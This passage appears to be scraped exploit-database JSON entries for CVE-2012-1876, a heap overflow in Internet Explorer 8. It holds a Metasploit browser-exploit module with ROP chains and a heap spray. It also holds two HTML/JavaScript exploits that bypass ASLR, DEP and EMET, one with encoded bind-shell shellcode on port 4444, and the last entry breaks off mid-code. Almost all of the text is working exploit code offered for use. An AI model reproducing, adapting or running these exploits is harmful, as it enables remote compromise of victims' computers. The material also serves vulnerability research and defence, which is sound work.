NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::Remote::BrowserAutopwn\r\n\tautopwn_info({\r\n\t\t:os_name => OperatingSystems::WINDOWS,\r\n\t\t:ua_minver => "8.0",\r\n\t\t:ua_maxver => "8.0",\r\n\t\t:rank => NormalRanking, # reliable memory corruption\r\n\t\t:javascript => true\r\n\t})\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Microsoft Internet Explorer Fixed Table Col Span Heap Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a heap overflow vulnerability in Internet Explorer caused\r\n\t\t\t\tby an incorrect handling of the span attribute for col elements from a fixed table,\r\n\t\t\t\twhen they are modified dynamically by javascript code.\r\n\t\t\t},\r\n\t\t\t'License' => 
MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Alexandre Pelletier', # Vulnerability analysis\r\n\t\t\t\t\t'mr_me <steventhomasseeley[at]gmail.com>', # Metasploit module\r\n\t\t\t\t\t'binjo', # Metasploit module\r\n\t\t\t\t\t'sinn3r', # Help with the Metasploit module\r\n\t\t\t\t\t'juan' # Help with the Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-1876' ],\r\n\t\t\t\t\t[ 'OSVDB', '82866'],\r\n\t\t\t\t\t[ 'BID', '53848' ],\r\n\t\t\t\t\t[ 'MSB', 'MS12-037' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => "\\x00",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', {} ],\r\n\t\t\t\t\t[ 'IE 8 on Windows XP SP3 with msvcrt ROP',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Rop' => :msvcrt\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'IE 8 on Windows 7 SP1',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Rop' => :jre\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Jun 12 2012',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef get_target(agent)\r\n\t\t#If the user is already specified by the user, we'll just use that\r\n\t\treturn target if target.name != 'Automatic'\r\n\r\n\t\tif agent =~ /NT 5\\.1/ and agent =~ /MSIE 8/\r\n\t\t\treturn targets[1] #IE 8 on Windows XP SP3\r\n\t\telsif agent =~ /NT 6\\.1/ and agent =~ /MSIE 8/\r\n\t\t\treturn targets[2] #IE 8 on Windows 7 with JRE\r\n\t\telse\r\n\t\t\treturn 
nil\r\n\t\tend\r\n\tend\r\n\r\n\tdef junk(n=4)\r\n\t\treturn rand_text_alpha(n).unpack("V").first\r\n\tend\r\n\r\n\tdef nop\r\n\t\treturn make_nops(4).unpack("V").first\r\n\tend\r\n\r\n\tdef get_payload(t)\r\n\r\n\t\tcode = payload.encoded\r\n\r\n\t\t# Both ROP chains generated by mona.py - See corelan.be\r\n\t\tcase t['Rop']\r\n\t\t\twhen :msvcrt\r\n\t\t\t\tprint_status("Using msvcrt ROP")\r\n\t\t\t\texec_size = code.length\r\n\t\t\t\trop =\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t0x77c4ec01, # retn\r\n\t\t\t\t\t\t0x77c4ec00, # pop ebp; retn\r\n\t\t\t\t\t\t0x77c15ed5, # xchg eax,esp; retn (pivot)\r\n\t\t\t\t\t\t0x77c4e392, # pop eax; retn\r\n\t\t\t\t\t\t0x77c11120, # <- *&VirtualProtect()\r\n\t\t\t\t\t\t0x77c2e493, # mov eax, dword ptr ds:[eax]; pop ebp; retn\r\n\t\t\t\t\t\tjunk,\r\n\t\t\t\t\t\t0x77c2dd6c,\r\n\t\t\t\t\t\t0x77c4ec00, # pop ebp; retn\r\n\t\t\t\t\t\t0x77c35459, # ptr to 'push esp; ret'\r\n\t\t\t\t\t\t0x77c47705, # pop ebx; retn\r\n\t\t\t\t\t\texec_size, # ebx\r\n\t\t\t\t\t\t0x77c3ea01, # pop ecx; retn\r\n\t\t\t\t\t\t0x77c5d000, # W pointer (lpOldProtect) (-> ecx)\r\n\t\t\t\t\t\t0x77c46100, # pop edi; retn\r\n\t\t\t\t\t\t0x77c46101, # rop nop (-> edi)\r\n\t\t\t\t\t\t0x77c4d680, # pop edx; retn\r\n\t\t\t\t\t\t0x00000040, # newProtect (0x40) (-> edx)\r\n\t\t\t\t\t\t0x77c4e392, # pop eax; retn\r\n\t\t\t\t\t\tnop, # nops (-> eax)\r\n\t\t\t\t\t\t0x77c12df9 # pushad; retn\r\n\t\t\t\t\t].pack("V*")\r\n\t\t\twhen :jre\r\n\t\t\t\tprint_status("Using JRE ROP")\r\n\t\t\t\texec_size = code.length\r\n\t\t\t\trop =\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t0x7c346c0b, # retn\r\n\t\t\t\t\t\t0x7c36f970, # pop ebp; retn\r\n\t\t\t\t\t\t0x7c348b05, # xchg eax,esp; retn (pivot)\r\n\t\t\t\t\t\t0x7c36f970, # pop ebp; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c36f970, # skip 4 bytes [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c34373a, # pop ebx ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\texec_size, # ebx\r\n\t\t\t\t\t\t0x7c3444d0, # pop edx ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x00000040, # 0x00000040-> 
edx\r\n\t\t\t\t\t\t0x7c361829, # pop ecx ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c38f036, # &Writable location [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c342766, # pop edi ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c346c0b, # retn (rop nop) [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c350564, # pop esi ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c3415a2, # jmp [eax] [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c3766ff, # pop eax ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c37a151, # ptr to &VirtualProtect() - 0x0ef [IAT msvcr71.dll]\r\n\t\t\t\t\t\t0x7c378c81, # pushad # add al,0ef ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c345c30 # ptr to 'push esp; ret ' [MSVCR71.dll]\r\n\t\t\t\t\t].pack("V*")\r\n\t\tend\r\n\r\n\t\tcode = rop + code\r\n\t\treturn code\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\tagent = request.headers['User-Agent']\r\n\t\tmy_target = get_target(agent)\r\n\r\n\t\t# Avoid the attack if the victim doesn't have the same setup we're targeting\r\n\t\tif my_target.nil?\r\n\t\t\tprint_error("Browser not supported: #{agent}")\r\n\t\t\tsend_not_found(cli)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tjs_code = Rex::Text.to_unescape(get_payload(my_target), Rex::Arch.endian(target.arch))\r\n\r\n\t\ttable_builder = ''\r\n\r\n\t\t0.upto(132) do |i|\r\n\t\t\ttable_builder << "<table style=\\"table-layout:fixed\\" ><col id=\\"#{i}\\" width=\\"41\\" span=\\"9\\" >  </col></table>"\r\n\t\tend\r\n\r\n\t\t# About smash_vtable():\r\n\t\t# * smash the vftable 0x07070024\r\n\t\t# * span => the amount to overwrite\r\n\t\tjs_element_id = Rex::Text.rand_text_alpha(4)\r\n\t\tspray_trigger_js = <<-JS\r\n\r\n\t\tvar dap = "EEEE";\r\n\t\twhile ( dap.length < 480 ) dap += dap;\r\n\r\n\t\tvar padding = "AAAA";\r\n\t\twhile ( padding.length < 480 ) padding += padding;\r\n\r\n\t\tvar filler = "BBBB";\r\n\t\twhile ( filler.length < 480 ) filler += filler;\r\n\r\n\t\tvar arr = new Array();\r\n\t\tvar rra = new Array();\r\n\r\n\t\tvar div_container = 
document.getElementById("#{js_element_id}");\r\n\t\tdiv_container.style.cssText = "display:none";\r\n\r\n\t\tfor (var i=0; i < 500; i+=2) {\r\n\t\t\trra[i] = dap.substring(0, (0x100-6)/2);\r\n\t\t\tarr[i] = padding.substring(0, (0x100-6)/2);\r\n\t\t\tarr[i+1] = filler.substring(0, (0x100-6)/2);\r\n\t\t\tvar obj = document.createElement("button");\r\n\t\t\tdiv_container.appendChild(obj);\r\n\t\t}\r\n\r\n\t\tfor (var i=200; i<500; i+=2 ) {\r\n\t\t\trra[i] = null;\r\n\t\t\tCollectGarbage();\r\n\t\t}\r\n\r\n\t\tfunction heap_spray(){\r\n\t\t\tCollectGarbage();\r\n\r\n\t\t\tvar shellcode = unescape("#{js_code}");\r\n\r\n\t\t\twhile (shellcode.length < 100000)\r\n\t\t\tshellcode = shellcode + shellcode;\r\n\t\t\tvar onemeg = shellcode.substr(0, 64*1024/2);\r\n\t\t\tfor (i=0; i<14; i++) {\r\n\t\t\t\tonemeg += shellcode.substr(0, 64*1024/2);\r\n\t\t\t}\r\n\r\n\t\t\tonemeg += shellcode.substr(0, (64*1024/2)-(38/2));\r\n\t\t\tvar spray = new Array();\r\n\r\n\t\t\tfor (i=0; i<400; i++) {\r\n\t\t\t\tspray[i] = onemeg.substr(0, onemeg.length);\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tfunction smash_vtable(){\r\n\t\t\tvar obj_col_0 = document.getElementById("132");\r\n\t\t\tobj_col_0.width = "1178993";\r\n\t\t\tobj_col_0.span = "44";\r\n\t\t}\r\n\r\n\t\tsetTimeout(function(){heap_spray()}, 400);\r\n\t\tsetTimeout(function(){smash_vtable()}, 700);\r\n\t\tJS\r\n\r\n\t\tif datastore['OBFUSCATE']\r\n\t\t\tspray_trigger_js = ::Rex::Exploitation::JSObfu.new(spray_trigger_js)\r\n\t\t\tspray_trigger_js.obfuscate\r\n\t\tend\r\n\r\n\t\t# build html\r\n\t\tcontent = <<-HTML\r\n\t\t<html>\r\n\t\t<body>\r\n\t\t<div id="#{js_element_id}"></div>\r\n\t\t#{table_builder}\r\n\t\t<script language='javascript'>\r\n\t\t#{spray_trigger_js}\r\n\t\t</script>\r\n\t\t</body>\r\n\t\t</html>\r\n\t\tHTML\r\n\r\n\t\tprint_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")\r\n\r\n\t\t# Transmit the response to the client\r\n\t\tsend_response_html(cli, content)\r\n\tend\r\n\r\nend\r\n\n ", "cvss": {"score": 
9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-74062"}, {"lastseen": "2017-11-19T17:58:26", "description": "No description provided by source.", "published": "2013-01-10T00:00:00", "title": "Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2013-01-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60566", "id": "SSV:60566", "sourceData": "\n <!--\r\n** Exploit Title: Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass\r\n** Author: sickness@offsec.com\r\n** Thanks to Ryujin and Dookie for their help.\r\n \r\n####################################################################\r\n \r\n** Affected Software: Internet Explorer 8\r\n** Vulnerability: Fixed Col Span ID\r\n** CVE: CVE-2012-1876\r\n** Metasploit exploit using NON-ASLR DLL: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_037_ie_colspan.rb\r\n** Vupen Blog post: http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php\r\n** Tested on Windows 7 (x86) - IE 8.0.7601.17514\r\n \r\n####################################################################\r\n \r\n** The exploit bypasses ASLR without the need of any NON-ASLR dll's using a leak :)\r\n** To get it working on a different version of Windows you will require to make your own chances to the exploit :)\r\n** Have fun :)\r\n-->\r\n \r\n<html>\r\n<body>\r\n<div id="evil"></div>\r\n<table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table>\r\n<script language='javascript'>\r\n \r\nfunction strtoint(str) {\r\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\r\n}\r\n \r\nvar free = "EEEE";\r\nwhile ( free.length < 500 ) free += free;\r\n \r\nvar string1 = "AAAA";\r\nwhile ( string1.length < 500 ) string1 += string1;\r\n \r\nvar 
string2 = "BBBB";\r\nwhile ( string2.length < 500 ) string2 += string2;\r\n \r\nvar fr = new Array();\r\nvar al = new Array();\r\nvar bl = new Array();\r\n \r\nvar div_container = document.getElementById("evil");\r\ndiv_container.style.cssText = "display:none";\r\n \r\nfor (var i=0; i < 500; i+=2) {\r\n fr[i] = free.substring(0, (0x100-6)/2);\r\n al[i] = string1.substring(0, (0x100-6)/2);\r\n bl[i] = string2.substring(0, (0x100-6)/2);\r\n var obj = document.createElement("button");\r\n div_container.appendChild(obj);\r\n}\r\n \r\nfor (var i=200; i<500; i+=2 ) {\r\n fr[i] = null;\r\n CollectGarbage();\r\n}\r\n \r\nfunction heapspray(cbuttonlayout) {\r\n CollectGarbage();\r\n var rop = cbuttonlayout + 4161; // RET\r\n var rop = rop.toString(16);\r\n var rop1 = rop.substring(4,8);\r\n var rop2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 11360; // POP EBP\r\n var rop = rop.toString(16);\r\n var rop3 = rop.substring(4,8);\r\n var rop4 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\r\n var rop = rop.toString(16);\r\n var rop5 = rop.substring(4,8);\r\n var rop6 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12377; // POP EBX\r\n var rop = rop.toString(16);\r\n var rop7 = rop.substring(4,8);\r\n var rop8 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 642768; // POP EDX\r\n var rop = rop.toString(16);\r\n var rop9 = rop.substring(4,8);\r\n var rop10 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\r\n var rop = rop.toString(16);\r\n var rop11 = rop.substring(4,8);\r\n var rop12 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 5504544; // Writable location\r\n var rop = rop.toString(16);\r\n var writable1 = rop.substring(4,8);\r\n var writable2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12462; // POP EDI\r\n var rop = rop.toString(16);\r\n var rop13 = rop.substring(4,8);\r\n var rop14 = 
rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\r\n var rop = rop.toString(16);\r\n var rop15 = rop.substring(4,8);\r\n var rop16 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 63776; // JMP EAX\r\n var rop = rop.toString(16);\r\n var jmpeax1 = rop.substring(4,8);\r\n var jmpeax2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 85751; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop17 = rop.substring(4,8);\r\n var rop18 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 4936; // VirtualProtect()\r\n var rop = rop.toString(16);\r\n var vp1 = rop.substring(4,8);\r\n var vp2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\r\n var rop = rop.toString(16);\r\n var rop19 = rop.substring(4,8);\r\n var rop20 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 234657; // PUSHAD\r\n var rop = rop.toString(16);\r\n var rop21 = rop.substring(4,8);\r\n var rop22 = rop.substring(0,4); // } RET\r\n \r\n \r\n var rop = cbuttonlayout + 408958; // PUSH ESP\r\n var rop = rop.toString(16);\r\n var rop23 = rop.substring(4,8);\r\n var rop24 = rop.substring(0,4); // } RET\r\n \r\n var shellcode = unescape("%u"+rop1+"%u"+rop2); // RET\r\n shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP\r\n shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP\r\n shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP\r\n shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP\r\n shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP\r\n shellcode+= unescape("%u1024%u0000"); // Size 0x00001024\r\n shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX\r\n shellcode+= unescape("%u0040%u0000"); // 0x00000040\r\n shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX\r\n shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location\r\n shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI\r\n shellcode+= 
unescape("%u"+rop1+"%u"+rop2); // RET\r\n shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI\r\n shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2); // JMP EAX\r\n shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX\r\n shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect()\r\n shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD\r\n shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP\r\n shellcode+= unescape("%u9090%u9090"); // crap\r\n shellcode+= unescape("%u9090%u9090"); // crap\r\n \r\n // Bind shellcode on 4444 :)\r\n shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +\r\n "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +\r\n "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +\r\n "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +\r\n "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +\r\n "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +\r\n "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +\r\n "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +\r\n "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +\r\n "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +\r\n "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +\r\n "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +\r\n "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +\r\n "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +\r\n "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +\r\n "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +\r\n "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +\r\n "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +\r\n "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +\r\n "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +\r\n "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +\r\n "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +\r\n "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +\r\n "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +\r\n "%u006a%uff53%u41d5");\r\n \r\n \r\n \r\n while (shellcode.length < 100000)\r\n shellcode = shellcode + shellcode;\r\n \r\n 
var onemeg = shellcode.substr(0, 64*1024/2);\r\n \r\n for (i=0; i<14; i++) {\r\n onemeg += shellcode.substr(0, 64*1024/2);\r\n }\r\n \r\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\r\n \r\n var spray = new Array();\r\n \r\n for (i=0; i<100; i++) {\r\n spray[i] = onemeg.substr(0, onemeg.length);\r\n }\r\n}\r\n \r\nfunction leak(){\r\n var leak_col = document.getElementById("132");\r\n leak_col.width = "41";\r\n leak_col.span = "19";\r\n}\r\n \r\nfunction get_leak() {\r\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\r\n str_addr = str_addr - 1410704;\r\n setTimeout(function(){heapspray(str_addr)}, 200); \r\n}\r\n \r\nfunction trigger_overflow(){\r\n var evil_col = document.getElementById("132");\r\n evil_col.width = "1178993";\r\n evil_col.span = "44";\r\n}\r\n \r\nsetTimeout(function(){leak()}, 300);\r\nsetTimeout(function(){get_leak()},700);\r\n//setTimeout(function(){heapspray()}, 900);\r\nsetTimeout(function(){trigger_overflow()}, 1200);\r\n \r\n</script>\r\n</body>\r\n</html>\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-60566"}, {"lastseen": "2017-11-19T13:21:35", "description": "No description provided by source.", "published": "2014-07-02T00:00:00", "type": "seebug", "title": "Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 4.1.X Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2014-07-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87111", "id": "SSV:87111", "sourceData": "\n <!--\r\n** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 4.1.X bypass\r\n** Offensive Security Research Team\r\n** http://www.offensive-security.com/vulndev/disarming-enhanced-mitigation-experience-toolkit-emet\r\n** Affected Software: Internet Explorer 8\r\n** Vulnerability: Fixed Col Span ID\r\n** CVE: CVE-2012-1876\r\n** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & 
EMET 4.1.X\r\n-->\r\n \r\n<html>\r\n<body>\r\n<div id="evil"></div>\r\n<table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table>\r\n<script language='javascript'>\r\n \r\nfunction strtoint(str) {\r\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\r\n}\r\n \r\nvar free = "EEEE";\r\nwhile ( free.length < 500 ) free += free;\r\n \r\nvar string1 = "AAAA";\r\nwhile ( string1.length < 500 ) string1 += string1;\r\n \r\nvar string2 = "BBBB";\r\nwhile ( string2.length < 500 ) string2 += string2;\r\n \r\nvar fr = new Array();\r\nvar al = new Array();\r\nvar bl = new Array();\r\n \r\nvar div_container = document.getElementById("evil");\r\ndiv_container.style.cssText = "display:none";\r\n \r\nfor (var i=0; i < 500; i+=2) {\r\n fr[i] = free.substring(0, (0x100-6)/2);\r\n al[i] = string1.substring(0, (0x100-6)/2);\r\n bl[i] = string2.substring(0, (0x100-6)/2);\r\n var obj = document.createElement("button");\r\n div_container.appendChild(obj);\r\n}\r\n \r\nfor (var i=200; i<500; i+=2 ) {\r\n fr[i] = null;\r\n CollectGarbage();\r\n}\r\n \r\nfunction heapspray(cbuttonlayout) {\r\n CollectGarbage();\r\n var rop = cbuttonlayout + 4161; // RET\r\n var rop = rop.toString(16);\r\n var rop1 = rop.substring(4,8);\r\n var rop2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 11360; // POP EBP\r\n var rop = rop.toString(16);\r\n var rop3 = rop.substring(4,8);\r\n var rop4 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\r\n var rop = rop.toString(16);\r\n var rop5 = rop.substring(4,8);\r\n var rop6 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12377; // POP EBX\r\n var rop = rop.toString(16);\r\n var rop7 = rop.substring(4,8);\r\n var rop8 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 642768; // POP EDX\r\n var rop = rop.toString(16);\r\n var rop9 = rop.substring(4,8);\r\n var rop10 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12201; // 
POP ECX --> Changed\r\n var rop = rop.toString(16);\r\n var rop11 = rop.substring(4,8);\r\n var rop12 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 5504544; // Writable location\r\n var rop = rop.toString(16);\r\n var writable1 = rop.substring(4,8);\r\n var writable2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12462; // POP EDI\r\n var rop = rop.toString(16);\r\n var rop13 = rop.substring(4,8);\r\n var rop14 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\r\n var rop = rop.toString(16);\r\n var rop15 = rop.substring(4,8);\r\n var rop16 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 63776; // JMP EAX\r\n var rop = rop.toString(16);\r\n var jmpeax1 = rop.substring(4,8);\r\n var jmpeax2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 85751; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop17 = rop.substring(4,8);\r\n var rop18 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 4936; // VirtualProtect()\r\n var rop = rop.toString(16);\r\n var vp1 = rop.substring(4,8);\r\n var vp2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\r\n var rop = rop.toString(16);\r\n var rop19 = rop.substring(4,8);\r\n var rop20 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 234657; // PUSHAD\r\n var rop = rop.toString(16);\r\n var rop21 = rop.substring(4,8);\r\n var rop22 = rop.substring(0,4); // } RET\r\n \r\n \r\n var rop = cbuttonlayout + 408958; // PUSH ESP\r\n var rop = rop.toString(16);\r\n var rop23 = rop.substring(4,8);\r\n var rop24 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2228408; // POP ECX\r\n var rop = rop.toString(16);\r\n var rop25 = rop.substring(4,8);\r\n var rop26 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1586172; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop27 = rop.substring(4,8);\r\n var rop28 
= rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\r\n var rop = rop.toString(16);\r\n var rop29 = rop.substring(4,8);\r\n var rop30 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1884912; // PUSH EAX\r\n var rop = rop.toString(16);\r\n var rop31 = rop.substring(4,8);\r\n var rop32 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\r\n var rop = rop.toString(16);\r\n var rop33 = rop.substring(4,8);\r\n var rop34 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\r\n var rop = rop.toString(16);\r\n var rop35 = rop.substring(4,8);\r\n var rop36 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 5036248; // ADD ESP,0C\r\n var rop = rop.toString(16);\r\n var rop37 = rop.substring(4,8);\r\n var rop38 = rop.substring(0,4); // } RET\r\n \r\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\r\n var getmodulew = getmodulew.toString(16);\r\n var getmodulew1 = getmodulew.substring(4,8);\r\n var getmodulew2 = getmodulew.substring(0,4); // } RET\r\n \r\n var getprocaddr = cbuttonlayout + 4836; // GetProcAddress\r\n var getprocaddr = getprocaddr.toString(16);\r\n var getprocaddr1 = getprocaddr.substring(4,8);\r\n var getprocaddr2 = getprocaddr.substring(0,4); // } RET\r\n \r\n var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING\r\n shellcode+= unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING\r\n shellcode+= unescape("%u4141%u4141"); // PADDING\r\n \r\n shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN\r\n shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN\r\n shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN\r\n \r\n // EMET disable part 0x01\r\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\r\n shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN\r\n shellcode+= 
